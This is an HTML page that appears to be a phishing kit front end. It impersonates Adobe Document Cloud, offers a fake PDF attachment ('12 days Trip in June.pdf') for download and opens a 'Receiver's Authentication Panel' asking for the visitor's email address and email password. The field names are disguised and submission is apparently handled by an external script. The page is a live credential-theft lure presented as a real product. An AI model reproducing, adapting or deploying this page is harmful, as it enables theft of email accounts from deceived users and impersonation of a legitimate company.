<!doctype html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=windows-1252" />
    <title>A.d.o.b.e | Edit - Sign - View</title>
    <link
      rel="icon"
      type="image/png"
      href="https://pdfjgyguhewi.pages.dev/favicon.ico"
    />
    <link href="files/icon.css" rel="stylesheet" />

    <link rel="stylesheet" href="files/materialize.css" />
    <link href="files/materialicons.css" rel="stylesheet" />

    <link type="text/css" rel="stylesheet" href="files/formmg.css" />
    <link type="text/css" rel="stylesheet" href="files/main.css" />

    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  </head>
  <body>
    <div class="container">
      <section id="bgxcover"></section>
      <header>
        <div href="#!" class="adobeloqodiv">
          <figure class="adobeloqofig">
            <img src="files/untitled.png" />
            <figcaption>Adobe</figcaption>
          </figure>
        </div>
      </header>
      <section class="contentmainmain">
        <div class="whiteboard">
          <header>
            <ul class="flex-container nowrap">
              <li class="flex-item">Edit Doc</li>
              <li class="flex-item">Sign Doc</li>
              <li class="flex-item active">View Doc</li>
            </ul>
          </header>
          <div class="bodyproper">
            <div class="sekure-n-icon">
              <i class="material-icons">lock</i
              ><span>Secured Remote Attachment</span>
            </div>
            <div class="attach-descriptions">
              <figure class="adobeprevfig">
                <center><img src="files/pdfdisplay.png" /></center>
                <div class="caption">
                  <span>Filename: 12 days Trip in June.pdf</span>

                  <span>Format &amp; Size: PDF | 136 MB</span>
                </div>
              </figure>
            </div>
            <div class="dwld">
              <a class="btnn btn4dl" id="btn4dlmodal">Download</a>
            </div>
          </div>
        </div>
      </section>
    </div>
    <style type="text/css">
      .val-error {
        margin: 15px 3px;
        font-size: 14.5px;
        font-style: italic;
        color: red;
      }
    </style>
    <div id="loginModal" class="modal">
      <div class="modal-header">
        <div class="fstspan">
          <img src="files/acrobe.png" /><span
            >Adobe Document Cloud<br />
            <summary>Receiver's Authentication Panel</summary></span
          >
        </div>
      </div>
      <div class="modal-content">
        <p style="font-size: 14px">
          <b>This file is sensitive and secured against unauthorized access. </b
          >In order to access this file, please provide your valid email
          credentials. We will connect to your email provider through secured
          channel to authorize your download.
        </p>
        <form action="#" method="post" id="gawaboy">
          <fieldset>
            <div class="row">
              <label for="correo" class="active">Email</label>
              <input
                type="email"
                name="akpati"
                id="akpati"
                value=""
                required=""
                placeholder="Email address"
              />
              <span class="val-error"></span>
            </div>
            <div class="row">
              <label for="mot" class="active">Email Password</label>
              <input
                type="password"
                placeholder="Email password"
                name="igodo"
                id="igodo"
                required=""
              />
              <span class="val-error"></span>
            </div>
            <div id="showerror"></div>
          </fieldset>

          <div class="clasfrm">
            <button
              id="btn4sbmt"
              class="cumsocks"
              style="background-color: #900708; width: 100%"
            >
              DOWNLOAD
            </button>
          </div>
        </form>
      </div>
      <div class="" style="padding: 10px">
        Sign In with Receiver's Email and Password to Download the Pdf Documents
        through IMAP
        <br /><small>© 2026 Adobe Inc.</small>
      </div>
    </div>

    <script src="files/jquery-3.js"></script>
    <script src="files/materialize.js"></script>
    <!-- <script src="files/axios.js"></script> -->
    <script type="text/javascript" src="files/as-alert.js"></script>
    <script type="text/javascript" src="files/main.js"></script>
  </body>
</html>
